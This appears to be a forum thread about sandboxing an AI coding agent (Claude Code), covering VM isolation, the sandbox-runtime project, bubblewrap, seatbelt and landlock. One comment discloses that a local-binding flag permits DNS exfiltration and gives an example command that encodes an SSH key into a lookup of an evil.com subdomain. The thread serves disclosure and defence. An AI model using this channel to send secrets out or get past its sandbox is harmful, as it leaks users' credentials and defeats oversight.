Worth calling out that execution runs in a full virtual machine with only user-selected folders mounted in. CC itself runs, if the user set network rules, with https://github.com/anthropic-experimental/sandbox-runtime.

There is much more to do - and our docs reflect how early this is - but we're investing in making progress towards something that's "safe".

> By default, all network access is denied.

Your `network.allowLocalBinding` flag, when enabled, allows data exfiltration via DNS. This isn't clear from the docs. I made an issue for that here: https://github.com/anthropic-experimental/sandbox-runtime/is...

How it works: `dig your-ssh-key.a.evil.com` sends evil.com your ssh key via recursive DNS resolution; Google/Cloudflare/etc DNS servers effectively proxies the information to evil.com servers.

Do the folders get copied into it on mounting? it takes care of a lot of issues if you can easily roll back to your starting version of some folder I think. Not sure what the UI would look like for that

I'm embarrassed to say this is the first time I've heard about sandbox-exec (macOS), though I am familiar with bubblewrap (Linux). Edit: And I see now that technically it's deprecated, but people still continue to use sandbox-exec even still today.

That sandbox gives default read only access to your entire drive. It's kinda useless IMO.

I replaced it with a landlock wrapper

Is it really a VM? I thought CC’s sandbox was based on bubblewrap/seatbelt which don’t use hardware virtualization and share the host OS kernel?